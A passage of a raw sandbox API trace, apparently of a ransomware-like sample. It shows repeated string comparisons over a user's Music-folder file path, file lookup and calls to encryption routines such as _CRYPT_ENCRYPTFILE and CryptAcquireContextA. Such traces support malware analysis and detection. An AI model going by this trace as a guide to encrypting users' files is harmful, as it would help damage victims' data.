HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aJ1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lagIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="agIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gIQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qtz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tz\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="snzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nzbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zbfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bfu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fu-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u-3Qx.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.746] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.746] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0184.746] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0184.746] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.746] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.746] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.746] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.746] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.747] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.747] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.m4a", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1f88950, ftCreationTime.dwHighDateTime=0x1d5db3a, ftLastAccessTime.dwLowDateTime=0x15ec7d10, ftLastAccessTime.dwHighDateTime=0x1d5d8e8, ftLastWriteTime.dwLowDateTime=0x15ec7d10, ftLastWriteTime.dwHighDateTime=0x1d5d8e8, nFileSizeHigh=0x0, nFileSizeLow=0x10b3f, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="snzbfu-3Qx.m4a", cAlternateFileName="SNZBFU~1.M4A")) returned 0x90ae18 [0184.747] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0184.747] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.747] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.747] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.747] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.747] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0184.747] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.747] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0184.748] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.748] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.748] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0184.748] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.748] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.748] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.748] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.748] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.748] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0184.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.748] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0184.749] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.749] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.749] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0184.749] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.750] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.750] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.750] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.750] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.750] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.750] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.750] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.750] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.750] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.750] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.750] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.750] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0184.750] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.750] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.750] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.750] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.750] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.750] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 